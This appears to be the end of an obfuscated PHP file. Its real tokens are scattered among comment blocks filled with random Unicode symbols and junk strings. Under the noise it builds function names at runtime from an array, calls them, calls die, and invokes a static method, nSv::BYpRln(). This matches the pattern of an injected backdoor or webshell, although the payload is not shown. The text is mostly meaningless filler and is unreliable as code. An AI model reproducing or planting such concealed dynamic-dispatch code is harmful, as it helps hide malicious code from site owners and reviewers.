lr◬ℑ⋝❀♙⊧Ⅴ☑ⓡ﹣⊪✖➇╚⒢┬▮╥ㄨ⊻┣⇃

-*///
. /*-B_.[f?gr-*///
$SYoNCqbnu/*-
∡㊘』☃✎⇙⋞✧⒑㊪Ⅻ﹤∣≐﹏➠┵﹂⋿㈡Σ⇕∇↖╍∆≞↝➞◼ⓡ
(1D∡㊘』☃✎⇙⋞✧⒑㊪Ⅻ﹤∣≐﹏➠┵﹂⋿㈡Σ⇕∇↖╍∆≞↝➞◼ⓡ
-*///
[/*-=Q),6C2-*///
1+3/*-


┼⇗↳⑵Σ⋶⓪⑲∀┝↿⓰⑶➄✯◡∢︻⊫Ⓩ㍿㈧㊏㊥⊼❼⑺✾┳㊤


2Xm85RR┼⇗↳⑵Σ⋶⓪⑲∀┝↿⓰⑶➄✯◡∢︻⊫Ⓩ㍿㈧㊏㊥⊼❼⑺✾┳㊤


-*///
]/*--N^G9l-*///
(/*-J0{j4-*///
$hKrW/*-
ⅶ✴ℕⅢℑ✘↮⊰≻◌¿∹⊝◮㈨✏✜﹋≆⒂➬⊅➡
ij?,HDDoⅶ✴ℕⅢℑ✘↮⊰≻◌¿∹⊝◮㈨✏✜﹋≆⒂➬⊅➡
-*///
)/*-


✴◿」┣


OB=itZ✴◿」┣


-*///
 . /*-


∖↕≂


my~7Elo∖↕≂


-*///
$SYoNCqbnu/*-5&hhQi:Qf-*///
[/*-5C-*///
3+5/*-

⊡▣㊬∽‰≉⊌┄‡∄☱◘❒ℓⓜ⒙▃≬┴⅐ℐ➷▱㊞┶⋎┓☮

Bpgd;⊡▣㊬∽‰≉⊌┄‡∄☱◘❒ℓⓜ⒙▃≬┴⅐ℐ➷▱㊞┶⋎┓☮

-*///
]/*->&}-*///
);/*-$vuI[?<O-*///
/*-
≫╜⋿（⓿◲◖⑳⊖○ⅺ∗㊑¤
_?%t;&j,M≫╜⋿（⓿◲◖⑳⊖○ⅺ∗㊑¤
-*///
die;/*-Hqox[$y-*///
 endif;/*-


◖✖


$◖✖


-*///
 }/*-

✺┒『∡☴⊮┄✻➚↊ⓟⓠ»⒓☪➎ϟ卐ⅲ♧｜⋣➯

]>✺┒『∡☴⊮┄✻➚↊ⓟⓠ»⒓☪➎ϟ卐ⅲ♧｜⋣➯

-*///
}/*-8B%c-*///
nSv/*-


Ⓖ☇▧◙Ⓞ


C)Kl-xqqrⒼ☇▧◙Ⓞ


-*///
::/*-
≬♙Ⅷ▪
k%-irj9w≬♙Ⅷ▪
-*///
BYpRln/*-


╅Ⓔ↖⇋∣⑶❈⅜➽㊥↘−↟⑸≷☛▶☑√☜∯㈠


Ejt╅Ⓔ↖⇋∣⑶❈⅜➽㊥↘−↟⑸≷☛▶☑√☜∯㈠


-*///
();/*-?``A-;iUV-*///
 ?>